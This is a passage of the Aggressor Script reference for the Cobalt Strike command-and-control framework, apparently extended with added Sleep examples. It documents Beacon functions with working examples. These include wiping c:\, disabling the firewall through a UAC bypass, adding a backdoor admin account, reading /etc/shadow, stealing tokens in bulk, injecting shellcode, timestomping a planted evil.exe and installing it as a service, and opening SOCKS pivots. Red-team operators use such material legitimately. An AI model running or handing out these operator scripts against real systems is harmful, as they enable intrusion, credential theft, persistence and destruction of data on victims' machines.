&beacon_remote_exec_method_describe, &beacon_remote_exec_method_register, &beacon_remote_exec_methods

Back to Top

brev2self

Ask Beacon to drop its current token. This calls the RevertToSelf() Win32 API.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

alias rev2self {
   brev2self($1);
}

Back to Top

brm

Ask Beacon to remove a file or folder.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the file or folder to remove

Example

# nuke the system
brm($1, "c:\\");

Back to Top

brportfwd

Ask Beacon to setup a reverse port forward.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the port to bind to on the target

$3 - the host to forward connections to

$4 - the port to forward connections to

Example

brportfwd($1, 80, "192.168.12.88", 80);

Back to Top

brportfwd_local

Ask Beacon to setup a reverse port forward that routes to the current Cobalt Strike client.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the port to bind to on the target

$3 - the host to forward connections to

$4 - the port to forward connections to

Example

brportfwd_local($1, 80, "192.168.12.88", 80);

Back to Top

brportfwd_stop

Ask Beacon to stop a reverse port forward

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the port bound on the target

Example

brportfwd_stop($1, 80);

Back to Top

brun

Ask Beacon to run a command

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the command and arguments to run

Note

This capability is a simpler version of the &beacon_execute_job function. The latter function is what &bpowershell and &bshell build on. This is a (slightly) more OPSEC-safe option to run commands and receive output from them.

Example

alias w {
   brun($1, "whoami /all");
}

Back to Top

brunas

Ask Beacon to run a command as another user.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the domain of the user

$3 - the user's username

$4 - the user's password

$5 - the command to run

Example

brunas($1, "CORP", "Administrator", "toor", "notepad.exe");

Back to Top

brunasadmin

REMOVED Removed in Cobalt Strike 4.0. Use &belevate_command with the uac-token-duplication option.

Ask Beacon to run a command in a high-integrity context (bypasses UAC).

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the command and its arguments.

Notes

This command uses the Token Duplication UAC bypass. This bypass has a few requirements:

  • Your user must be a local admin
  • If Always Notify is enabled, an existing high integrity process must be running in the current desktop session.

Example

# disable the firewall
brunasadmin($1, "cmd.exe /C netsh advfirewall set allprofiles state off");

Back to Top

brunu

Ask Beacon to run a process under another process.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID of the parent process

$3 - the command + arguments to run

Example

brunu($1, 1234, "notepad.exe");

Back to Top

bscreenshot

Ask Beacon to take a screenshot.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - (optional) the PID to inject the screenshot tool or $null

$3 - (optional) the architecture of the target PID (x86|x64) or $null

Example

Spawn a temporary process
item "&Screenshot" {
   binput($1, "screenshot");
   bscreenshot($1);
}
Inject into the specified process
bscreenshot($1, 1234, "x64");

Back to Top

bscreenwatch

Ask Beacon to take periodic screenshots

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - (optional) the PID to inject the screenshot tool or $null

$3 - (optional) the architecture of the target PID (x86|x64) or $null

Example

Spawn a temporary process
item "&Screenwatch" {
   binput($1, "screenwatch");
   bscreenwatch($1);
}
Inject into the specified process
bscreenwatch($1, 1234, "x64");

Back to Top

bsetenv

Ask Beacon to set an environment variable

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the environment variable to set

$3 - the value to set the environment variable to (specify $null to unset the variable)

Example

alias tryit {
   bsetenv($1, "foo", "BAR!");
   bshell($1, "echo %foo%");
}

Back to Top

bshell

Ask Beacon to run a command with cmd.exe

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the command and arguments to run

Example

alias adduser {
   bshell($1, "net user $2 B00gyW00gy1234! /ADD");
   bshell($1, "net localgroup \"Administrators\" $2 /ADD");
}

Back to Top

bshinject

Inject shellcode (from a local file) into a specific process.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID of the process to inject into

$3 - the process architecture (x86 | x64)

$4 - the local file with the shellcode

Example

bshinject($1, 1234, "x86", "/path/to/stuff.bin");

Back to Top

bshspawn

Spawn shellcode (from a local file) into another process. This function benefits from Beacon's configuration to spawn post-exploitation jobs (e.g., spawnto, ppid, etc.)

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the process architecture (x86 | x64)

$3 - the local file with the shellcode

Example

bshspawn($1, "x86", "/path/to/stuff.bin");

Back to Top

bsleep

Ask Beacon to change its beaconing interval and jitter factor.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the number of seconds between beacons.

$3 - the jitter factor [0-99]

Example

alias stealthy {
   # sleep for 1 hour with 30% jitter factor
   bsleep($1, 60 * 60, 30);
}

Back to Top

bsleepu

Ask Beacon to change its beaconing interval and jitter factor.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - beacon sleep period string.

The beacon sleep period string takes the format: ud vh xm ys zj

Where:

u is the number of days

v is the number of hours

x is the number of minutes

y is the number of seconds

z is the jitter factor [0 - 99]

Example

alias stealthy {
   # sleep for 2 days 13 hours 45 minutes 8 seconds with 30% jitter factor
   bsleepu($1, "2d 13h 45m 8s 30j");
}

Back to Top

bsocks

Start a SOCKS proxy server associated with a beacon.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the port to bind to

$3 - SOCKS version [SOCKS4|SOCKS5] Default: SOCKS4

For SOCKS 5 only:

$4 - enable/disable NoAuth authentication [enableNoAuth|disableNoAuth] Default: enableNoAuth

$5 - username for User/Password authentication [blank|username] Default: Blank

$6 - password for User/Password authentication [blank|password] Default: Blank

$7 - enable logging [enableLogging|disableLogging] Default: disableLogging

Example

alias socksPorts {
   bsocks($1, 10401);
   bsocks($1, 10402, "SOCKS4");
   bsocks($1, 10501, "SOCKS5");
   bsocks($1, 10502, "SOCKS5", "enableNoAuth", "", "", "disableLogging");
   bsocks($1, 10503, "SOCKS5", "enableNoAuth", "myname", "mypassword", "disableLogging");
   bsocks($1, 10504, "SOCKS5", "disableNoAuth", "myname", "mypassword", "enableLogging");
}

Back to Top

bsocks_stop

Stop SOCKS proxy servers associated with the specified Beacon.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

alias stopsocks {
   bsocks_stop($1);
}

Back to Top

bspawn

Ask Beacon to spawn a new session

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the listener to target.

$3 - the architecture to spawn a process for (defaults to current beacon arch)

Example

item "&Spawn" {
   openPayloadHelper(lambda({
      binput($bids, "spawn x86 $1");
      bspawn($bids, $1, "x86");
   }, $bids => $1));
}

Back to Top

bspawnas

Ask Beacon to spawn a session as another user.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the domain of the user

$3 - the user's username

$4 - the user's password

$5 - the listener to spawn

Example

bspawnas($1, "CORP", "Administrator", "toor", "my listener");

Back to Top

bspawnto

Change the default program Beacon spawns to inject capabilities into.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the architecture we're modifying the spawnto setting for (x86, x64)

$3 - the program to spawn

Notes

The value you specify for spawnto must work from x86->x86, x86->x64, x64->x86, and x64->x64 contexts. This is tricky. Follow these rules and you'll be OK:

1. Always specify the full path to the program you want Beacon to spawn for its post-ex jobs.

2. Environment variables (e.g., %windir%) are OK within these paths.

3. Do not specify %windir%\system32 or c:\windows\system32 directly. Always use syswow64 (x86) and sysnative (x64). Beacon will adjust these values to system32 if it's necessary.

4. For an x86 spawnto value, you must specify an x86 program. For an x64 spawnto value, you must specify an x64 program.

Example

# let's make everything lame.
on beacon_initial {
   binput($1, "prep session with new spawnto values.");
   bspawnto($1, "x86", "%windir%\\syswow64\\notepad.exe");
   bspawnto($1, "x64", "%windir%\\sysnative\\notepad.exe");
}

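The four rules above are easy to break by hand. The following is an added example, not part of the original documentation, that checks a spawnto value against those rules before calling &bspawnto. It treats "lives under syswow64" as the test for rule 4 on the x86 side and "lives under sysnative" on the x64 side, which is a proxy for the program's architecture rather than a check of the PE header; the spawnto-safe alias name is this example's own.

```sleep
# Added example: validate a spawnto value against the rules on this page.
# Returns an empty string when the value is acceptable, otherwise the reason
# it was rejected.
sub check_spawnto {
   local('$arch $path $lower');
   ($arch, $path) = @_;
   $lower = lc($path);

   # rule 1 and 2: a full path, either drive-rooted (c:\...) or starting
   # with an environment variable (%windir%\...)
   if ($lower !ismatch "^([a-z]:|%[a-z_0-9]+%)\\\\.+") {
      return "not a full path";
   }

   # rule 3: never name system32 directly; Beacon maps the others to it
   if ("*\\system32\\*" iswm $lower) {
      return "use syswow64 (x86) or sysnative (x64) instead of system32";
   }

   # rule 4: the directory must agree with the architecture
   if ($arch eq "x86" && "*\\syswow64\\*" !iswm $lower) {
      return "x86 spawnto must live under syswow64";
   }
   if ($arch eq "x64" && "*\\sysnative\\*" !iswm $lower) {
      return "x64 spawnto must live under sysnative";
   }
   if ($arch ne "x86" && $arch ne "x64") {
      return "architecture must be x86 or x64";
   }

   return "";
}

# spawnto-safe [x86|x64] [full path]
alias spawnto-safe {
   local('$why');
   $why = check_spawnto($2, $3);
   if ($why eq "") {
      btask($1, "Tasked Beacon to set $2 spawnto to $3");
      bspawnto($1, $2, $3);
   }
   else {
      berror($1, "spawnto rejected: $why");
   }
}
```

With this in place, check_spawnto("x64", "c:\\windows\\system32\\notepad.exe") is rejected with the system32 message, while "%windir%\\sysnative\\notepad.exe" is accepted for x64 and "%windir%\\syswow64\\notepad.exe" for x86.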
Back to Top

bspawnu

Ask Beacon to spawn a session under another process.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the process to spawn this session under

$3 - the listener to spawn

Example

bspawnu($1, 1234, "my listener");

Back to Top

bspunnel

Spawn and tunnel an agent through this Beacon (via a target localhost-only reverse port forward)

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the host of the controller

$3 - the port of the controller

$4 - a file with position-independent code to execute in a temporary process.

Example

bspunnel($1, "127.0.0.1", 4444, script_resource("agent.bin"));

Back to Top

bspunnel_local

Spawn and tunnel an agent through this Beacon (via a target localhost-only reverse port forward). Note: this reverse port forward tunnel traverses through the Beacon chain to the team server and, via the team server, out through the requesting Cobalt Strike client.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the host of the controller

$3 - the port of the controller

$4 - a file with position-independent code to execute in a temporary process.

Example

bspunnel_local($1, "127.0.0.1", 4444, script_resource("agent.bin"));

Back to Top

bssh

Ask Beacon to spawn an SSH session.

Arguments

$1 - id for the beacon. This may be an array or a single ID.

$2 - IP address or hostname of the target

$3 - port (e.g., 22)

$4 - username

$5 - password

$6 - (optional) the PID to inject the SSH client into or $null

$7 - (optional) the architecture of the target PID (x86|x64) or $null

Example

Spawn a temporary process
bssh($1, "172.16.20.128", 22, "root", "toor");
Inject into the specified process
bssh($1, "172.16.20.128", 22, "root", "toor", 1234, "x64");

Back to Top

bssh_key

Ask Beacon to spawn an SSH session using the data from a key file. The key file needs to be in the PEM format. If the file is not in the PEM format then make a copy of the file and convert the copy with the following command:

/usr/bin/ssh-keygen -f [/path/to/copy] -e -m pem -p

Arguments

$1 - id for the beacon. This may be an array or a single ID.

$2 - IP address or hostname of the target

$3 - port (e.g., 22)

$4 - username

$5 - key data (as a string)

$6 - (optional) the PID to inject the SSH client into or $null

$7 - (optional) the architecture of the target PID (x86|x64) or $null

Example

alias myssh {
   local('$pid $arch $handle $keydata');
   $pid  = $2;
   $arch = $3;
   $handle  = openf("/path/to/key.pem");
   $keydata = readb($handle, -1);
   closef($handle);

   if ($pid > 0 && ($arch eq "x86" || $arch eq "x64")) {
      bssh_key($1, "172.16.20.128", 22, "root", $keydata, $pid, $arch);
   } else {
      bssh_key($1, "172.16.20.128", 22, "root", $keydata);
   }
}

Back to Top

bstage

REMOVED This function is removed in Cobalt Strike 4.0. Use &beacon_stage_tcp or &beacon_stage_pipe to explicitly stage a payload. Use &beacon_link to link to it.

bsteal_token

Ask Beacon to steal a token from a process.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID to take the token from

$3 - (optional) the OpenProcessToken access mask. Omit it, or pass 0, for the default (TOKEN_ALL_ACCESS).

Console usage (the steal_token command):

steal_token [pid]
steal_token [pid] <OpenProcessToken access mask>

Suggested access mask values:

  • blank = default (TOKEN_ALL_ACCESS)
  • 0 = TOKEN_ALL_ACCESS
  • 11 = TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_QUERY (1+2+8)

Access mask values:

STANDARD_RIGHTS_REQUIRED : 983040
TOKEN_ASSIGN_PRIMARY     : 1
TOKEN_DUPLICATE          : 2
TOKEN_IMPERSONATE        : 4
TOKEN_QUERY              : 8
TOKEN_QUERY_SOURCE       : 16
TOKEN_ADJUST_PRIVILEGES  : 32
TOKEN_ADJUST_GROUPS      : 64
TOKEN_ADJUST_DEFAULT     : 128
TOKEN_ADJUST_SESSIONID   : 256

NOTE:

A reduced access mask is helpful when stealing a token from a process running as SYSTEM fails with: Could not open process token: {pid} (5). TOKEN_ALL_ACCESS asks for more than the steal needs; 11 requests only the rights needed to query, duplicate and assign the token.

You can set your preferred default with '.steal_token_access_mask' in the Malleable C2 global options.

Example

alias steal_token {
   bsteal_token($1, int($2));
}

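The numeric masks above are easy to get wrong by hand. The following is an added example, not part of the original documentation, that builds the OpenProcessToken access mask from the TOKEN_* names in the table above and passes it as the third argument to &bsteal_token (matching the console usage shown above). The flag values are the Win32 constants listed on this page; the token_mask helper and the alias's argument handling are this example's own.

```sleep
# Added example: compose an OpenProcessToken access mask from flag names.
%token_rights = %(
   TOKEN_ASSIGN_PRIMARY     => 1,
   TOKEN_DUPLICATE          => 2,
   TOKEN_IMPERSONATE        => 4,
   TOKEN_QUERY              => 8,
   TOKEN_QUERY_SOURCE       => 16,
   TOKEN_ADJUST_PRIVILEGES  => 32,
   TOKEN_ADJUST_GROUPS      => 64,
   TOKEN_ADJUST_DEFAULT     => 128,
   TOKEN_ADJUST_SESSIONID   => 256,
   STANDARD_RIGHTS_REQUIRED => 983040
);

# OR the named rights together; an unknown name is reported and skipped.
# token_mask("TOKEN_ASSIGN_PRIMARY", "TOKEN_DUPLICATE", "TOKEN_QUERY") is 11
sub token_mask {
   local('$mask $name');
   $mask = 0;
   foreach $name (@_) {
      $name = uc($name);
      if ($name in %token_rights) {
         $mask = $mask | %token_rights[$name];
      }
      else {
         warn("unknown token right: $name");
      }
   }
   return $mask;
}

# steal_token [pid] [TOKEN_RIGHT ...]
# With no rights named, Beacon uses its default (TOKEN_ALL_ACCESS). Naming
# TOKEN_ASSIGN_PRIMARY TOKEN_DUPLICATE TOKEN_QUERY yields the reduced mask 11
# for SYSTEM processes that refuse TOKEN_ALL_ACCESS with error 5.
alias steal_token {
   local('@rights $mask');
   @rights = sublist(@_, 2);
   if (size(@rights) == 0) {
      bsteal_token($1, int($2));
   }
   else {
      $mask = token_mask(@rights);
      btask($1, "Tasked Beacon to steal token from $2 with access mask $mask");
      bsteal_token($1, int($2), $mask);
   }
}
```

Keeping the rights named in the alias's arguments, rather than a magic 11, makes the operator's intent visible in the task acknowledgement that &btask records.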
Back to Top

bsudo

Ask Beacon to run a command via sudo (SSH sessions only)

Arguments

$1 - the id for the session. This may be an array or a single ID.

$2 - the password for the current user

$3 - the command and arguments to run

Example

# hashdump [password]
ssh_alias hashdump {
   bsudo($1, $2, "cat /etc/shadow");
}

Back to Top

bsyscall_method

Ask Beacon to change its syscall method.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the syscall method. Supported methods are:

None: Use the standard Windows API function.

Direct: Use the Nt* version of the function.

Indirect: Jump to the appropriate instruction within the Nt* version of the function.

NOTE:

If the $2 argument is empty, Beacon is tasked to query the currently used syscall method.

Example

alias syscall_method {
bsyscall_method($1, $2);
}

Back to Top

btask

Report a task acknowledgement for a Beacon. This task acknowledgement will also contribute to the narrative in Cobalt Strike's Activity Report and Sessions Report.

Arguments

$1 - the id for the beacon to post to

$2 - the text to post

$3 - (optional) a string with MITRE ATT&CK Tactic IDs. Use a comma and a space to specify multiple IDs in one string.

https://attack.mitre.org

Example

alias foo {
   btask($1, "User tasked beacon to foo", "T1015");
}

Back to Top

btimestomp

Ask Beacon to change the file modified/accessed/created times to match another file.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the file to update timestamp values for

$3 - the file to grab timestamp values from

Example

alias persist {
   bcd($1, "c:\\windows\\system32");
   bupload($1, script_resource("evil.exe"));
   btimestomp($1, "evil.exe", "cmd.exe");
   bshell($1, 'sc create evil binpath= "c:\\windows\\system32\\evil.exe"');
   bshell($1, 'sc start evil');
}

Back to Top

btoken_store_remove

Ask Beacon to remove specific access tokens from the store.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the array of token IDs to remove.

Example

alias token-store_remove {
btoken_store_remove($1, @(int($2)));
}

Back to Top

btoken_store_remove_all

Ask Beacon to remove all tokens from the store.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

alias token-store_remove_all {
btoken_store_remove_all($1);
}

Back to Top

btoken_store_show

Ask Beacon to print the tokens currently available in the token store.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

alias token-store_show {
btoken_store_show($1);
}

Back to Top

btoken_store_steal

Ask Beacon to steal a token and store it in the token store.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the array of PIDs to take the tokens from.

$3 - the OpenProcessToken access mask.

Example

alias token-store_steal {
btoken_store_steal($1, @(int($2)), 11);
}

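The example above steals from one PID typed by the operator. The following is an added example, not part of the original documentation, that finds every process with a given image name through a &bps callback and hands the whole PID array to &btoken_store_steal in one task, using the reduced mask 11 (TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_QUERY) from the &bsteal_token notes. It assumes the ps results arrive one process per line with name, parent PID and PID as the first three whitespace-separated fields, as the prepenv example on this page does; &blog and &berror are documented Aggressor functions not covered in this section.

```sleep
# Added example: steal tokens from every process with a given name into the
# token store, then list the store.
# token-store_steal_by_name [image name]
alias token-store_steal_by_name {
   local('$target');
   $target = $2;

   btask($1, "Tasked Beacon to steal tokens from every $target process");

   bps($1, lambda({
      local('$entry $name $pid @pids');
      foreach $entry (split("\n", $2)) {
         # name, ppid, pid are the first three columns of the ps output
         ($name, $null, $pid) = split("\\s+", $entry);
         if (lc($name) eq lc($target)) {
            push(@pids, int($pid));
         }
      }

      if (size(@pids) == 0) {
         berror($1, "no process named $target");
      }
      else {
         blog($1, "stealing " . size(@pids) . " token(s) from $target");
         btoken_store_steal($1, @pids, 11);
         btoken_store_show($1);
      }
   }, $target => $target));
}
```

The lambda captures $target so it is still available when the ps results come back; inside the callback $1 is the beacon ID and $2 the results, so the outer $2 (the image name) must be copied into a captured variable first.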
Back to Top

btoken_store_steal_and_use

Ask Beacon to steal a token, store it and immediately apply it to the beacon.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the PID to take the token from.

$3 - the OpenProcessToken access mask.

Example

alias token-store_steal_and_use {
btoken_store_steal_and_use($1, int($2), 11);
}

Back to Top

btoken_store_use

Ask Beacon to use a token from the token store.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the token ID.

Example

alias token-store_use {
btoken_store_use($1, int($2));
}

Back to Top

bunlink

Ask Beacon to unlink a Beacon it's connected to over a TCP socket or named pipe.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the target host to unlink (specified as an IP address)

$3 - (optional) the PID of the target session to unlink

Example

bunlink($1, "172.16.48.3");

Back to Top

bupload

Ask a Beacon to upload a file

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the local path to the file to upload

Example

bupload($1, script_resource("evil.exe"));

Back to Top

bupload_raw

Ask a Beacon to upload a file

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

$2 - the remote file name of the file

$3 - the raw content of the file

$4 - (optional) the local path to the file (if there is one)

Example

$data = artifact("my listener", "exe");
bupload_raw($1, "\\\\DC\\C$\\foo.exe", $data);

Back to Top

bwdigest

REMOVED Removed in Cobalt Strike 4.0. Use &bmimikatz directly.

bwinrm

REMOVED Removed in Cobalt Strike 4.0. Use &bjump with winrm or winrm64 built-in options.

bwmi

REMOVED Removed in Cobalt Strike 4.0.

Back to Top

call

Issue a call to the team server.

Arguments

$1 - the command name

$2 - a callback to receive a response to this request. The callback will receive two arguments. The first is the call name. The second is the response.

... - one or more arguments to pass into this call.

Example

call("aggressor.ping", { warn(@_); }, "this is my value");

Back to Top

closeClient

Close the current Cobalt Strike team server connection.

Example

closeClient();

Back to Top

colorPanel

Generate a Java component to set accent colors within Cobalt Strike's data model

Arguments

$1 - the prefix

$2 - an array of IDs to change colors for

Example

popup targets {
   menu "&Color" {
      insert_component(colorPanel("targets", $1));
   }
}
See also

&highlight

Back to Top

credential_add

Add a credential to the data model

Arguments

$1 - username

$2 - password

$3 - realm

$4 - source

$5 - host

Example

command falsecreds {
   for ($x = 0; $x < 100; $x++) {
      credential_add("user $+ $x", "password $+ $x", "CORP", "manual", "DC");
   }
}

Back to Top

credentials

Returns a list of application credentials in Cobalt Strike's data model.

Returns

An array of dictionary objects with information about each credential entry.

Example

printAll(credentials());

Back to Top

custom_event

Broadcast a custom event to all Cobalt Strike clients.

Arguments

$1 - the topic name

$2 - the event data

Example

custom_event("my-topic", %(foo => 42, bar => "hello"));

Back to Top

custom_event_private

Send a custom event to one specific Cobalt Strike client.

Arguments

$1 - who to send the custom event to

$2 - the topic name

$3 - the event data

Example

custom_event_private("neo", "my-topic", 42);

Back to Top

data_keys

List the query-able keys from Cobalt Strike's data model

Returns

A list of keys that you may query with &data_query

Example

foreach $key (data_keys()) {
   println("\n\c4=== $key ===\n");
   println(data_query($key));
}

Back to Top

data_query

Queries Cobalt Strike's data model

Arguments

$1 - the key to pull from the data model

Returns

A Sleep representation of the queried data.

Example

println(data_query("targets"));

Back to Top

dbutton_action

Adds an action button to a &dialog. When this button is pressed, the dialog closes and its callback is called. You may add multiple buttons to a dialog. Cobalt Strike will line these buttons up in a row and center them at the bottom of the dialog.

Arguments

$1 - the $dialog object

$2 - the button label

Example

dbutton_action($dialog, "Start");
dbutton_action($dialog, "Stop");

Back to Top

dbutton_help

Adds a Help button to a &dialog. When this button is pressed, Cobalt Strike will open the user's browser to the specified URL.

Arguments

$1 - the $dialog object

$2 - the URL to go to

Example

dbutton_help($dialog, "http://www.google.com");

Back to Top

dialog

Create a dialog. Use &dialog_show to show it.

Arguments

$1 - the title of the dialog

$2 - a %dictionary mapping row names to default values

$3 - a callback function. Called when the user presses a &dbutton_action button. $1 is a reference to the dialog. $2 is the button name. $3 is a dictionary that maps each row's name to its value.

Returns

A scalar with a $dialog object.

Example

sub callback {
   # prints: Pressed Go, a is: Apple
   println("Pressed $2 $+ , a is: " . $3['a']);
}

$dialog = dialog("Hello World", %(a => "Apple", b => "Bat"), &callback);
drow_text($dialog, "a", "Fruit:  ");
drow_text($dialog, "b", "Rodent: ");
dbutton_action($dialog, "Go");
dialog_show($dialog);

Back to Top

dialog_description

Adds a description to a &dialog

Arguments

$1 - a $dialog object

$2 - the description of this dialog

$3 - (optional) the number of lines of text to show for the description of this dialog. When it is not specified two lines of text are shown for the description of this dialog. The maximum number of lines that can be shown is 20.

Example

dialog_description($dialog, "I am the Hello World dialog.");
dialog_description($dialog, "I am the Hello World dialog.", 2);

Back to Top

dialog_show

Shows a &dialog.

Arguments

$1 - the $dialog object

Example

dialog_show($dialog);

Back to Top

dispatch_event

Call a function in Java Swing's Event Dispatch Thread. Java's Swing Library is not thread safe. All changes to the user interface should happen from the Event Dispatch Thread.

Arguments

$1 - the function to call

Example

dispatch_event({
   println("Hello World"); 
});

Back to Top

downloads

Returns a list of downloads in Cobalt Strike's data model.

Returns

An array of dictionary objects with information about each downloaded file.

Example

printAll(downloads());

Back to Top

drow_beacon

Adds a beacon selection row to a &dialog

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example

drow_beacon($dialog, "bid", "Session: ");

Back to Top

drow_checkbox

Adds a checkbox to a &dialog

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

$4 - the text next to the checkbox

Example

drow_checkbox($dialog, "box", "Scary: ", "Check me... if you dare");

Back to Top

drow_combobox

Adds a combobox to a &dialog

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

$4 - an array of options to choose from

Example

drow_combobox($dialog, "combo", "Options", @("apple", "bat", "cat"));

Back to Top

drow_exploits

Adds a privilege escalation exploit selection row to a &dialog

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example

drow_exploits($dialog, "exploit", "Exploit: ");

Back to Top

drow_file

Adds a file chooser row to a &dialog

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example

drow_file($dialog, "file", "Choose: ");

Back to Top

drow_interface

Adds a VPN interface selection row to a &dialog

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example

drow_interface($dialog, "int", "Interface: ");

Back to Top

drow_krbtgt

Adds a krbtgt selection row to a &dialog

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example

drow_krbtgt($dialog, "hash", "krbtgt hash: ");

Back to Top

drow_listener

Adds a listener selection row to a &dialog. This row only shows listeners with stagers (e.g., windows/beacon_https/reverse_https).

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example

drow_listener($dialog, "listener", "Listener: ");

Back to Top

drow_listener_smb

DEPRECATED This function is deprecated in Cobalt Strike 4.0. It's now equivalent to &drow_listener_stage

Back to Top

drow_listener_stage

Adds a listener selection row to a &dialog. This row shows all Beacon and Foreign listener payloads.

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example

drow_listener_stage($dialog, "listener", "Stage: ");

Back to Top

drow_mailserver

Adds a mail server field to a &dialog.

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example

drow_mailserver($dialog, "mail", "SMTP Server: ");

Back to Top

drow_proxyserver

DEPRECATED This function is deprecated in Cobalt Strike 4.0. The proxy configuration is now tied directly to the listener.

Adds a proxy server field to a &dialog.

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example

drow_proxyserver($dialog, "proxy", "Proxy: ");

Back to Top

drow_site

Adds a site/URL field to a &dialog.

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example

drow_site($dialog, "url", "Site: ");

Back to Top

drow_text

Adds a text field row to a &dialog

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

$4 - (optional) The width of this text field (in characters). This value isn't always honored (it won't shrink the field, but it will make it wider).

Example

drow_text($dialog, "name", "Name: ");

Back to Top

drow_text_big

Adds a multi-line text field to a &dialog

Arguments

$1 - a $dialog object

$2 - the name of this row

$3 - the label for this row

Example

drow_text_big($dialog, "addr", "Address: ");

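The drow_* entries above each show one row in isolation. The following is an added example, not part of the original documentation, that assembles a complete dialog from several of them and uses the callback's $3 dictionary (keyed by row name) to choose between &bspawn and &bspawnas. It assumes the beacon_bottom popup hook used by Cobalt Strike's default menus, that the checkbox value stringifies to "true" when ticked, and a placeholder help URL; the row names and the spawn_dialog_cb function are this example's own.

```sleep
# Added example: a spawn dialog built from drow_beacon, drow_listener_stage,
# drow_combobox, drow_checkbox and drow_text rows.
sub spawn_dialog_cb {
   local('$bid $listener');
   $bid      = $3['bid'];
   $listener = $3['listener'];

   # only the "Spawn" button does work; "Cancel" just closes the dialog
   if ($2 ne "Spawn") {
      return;
   }

   if ($3['runas'] eq "true") {
      # log the command without the password, then spawn as the other user
      binput($bid, "spawnas " . $3['domain'] . "\\" . $3['user'] . " <password> $listener");
      bspawnas($bid, $3['domain'], $3['user'], $3['pass'], $listener);
   }
   else {
      binput($bid, "spawn " . $3['arch'] . " $listener");
      bspawn($bid, $listener, $3['arch']);
   }
}

popup beacon_bottom {
   item "&Spawn (dialog)" {
      local('$dialog');
      # $1 is the array of selected beacon IDs; preselect the first one
      $dialog = dialog("Spawn Session", %(bid => $1[0], arch => "x64", runas => "false"), &spawn_dialog_cb);
      dialog_description($dialog, "Spawn a new Beacon from the selected session, optionally as another user.");
      drow_beacon($dialog, "bid", "Session: ");
      drow_listener_stage($dialog, "listener", "Listener: ");
      drow_combobox($dialog, "arch", "Arch: ", @("x86", "x64"));
      drow_checkbox($dialog, "runas", "Run as: ", "another user (fill in the fields below)");
      drow_text($dialog, "domain", "Domain: ");
      drow_text($dialog, "user", "User: ");
      drow_text($dialog, "pass", "Password: ");
      dbutton_action($dialog, "Spawn");
      dbutton_action($dialog, "Cancel");
      dbutton_help($dialog, "https://www.cobaltstrike.com/");
      dialog_show($dialog);
   }
}
```

Every dbutton_action button closes the dialog and calls the same callback with the button label in $2, so the callback has to check which button was pressed before acting on the form values.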
Back to Top

dstamp

Format a time into a date/time value. This value includes seconds.

Arguments

$1 - the time [milliseconds since the UNIX epoch]

Example

println("The time is now: " . dstamp(ticks()));
See also

&tstamp

Back to Top

elog

Publish a notification to the event log

Arguments

$1 - the message

Example

elog("The robot invasion has begun!");

Back to Top

encode

Obfuscate a position-independent blob of code with an encoder.

Arguments

$1 - position independent code (e.g., shellcode, "raw" stageless Beacon) to apply encoder to

$2 - the encoder to use

$3 - the architecture (e.g., x86, x64)

Encoder Description
alpha Alphanumeric encoder (x86-only)
xor XOR encoder

Notes

  • The encoded position-independent blob must run from a memory page that has RWX permissions or the decode step will crash the current process.
  • alpha encoder: The EDI register must contain the address of the encoded blob. &encode prepends a 10-byte (non-alphanumeric) program to the beginning of the alphanumeric encoded blob. This program calculates the location of the encoded blob and sets EDI for you. If you plan to set EDI yourself, you may remove these first 10 bytes.

Returns

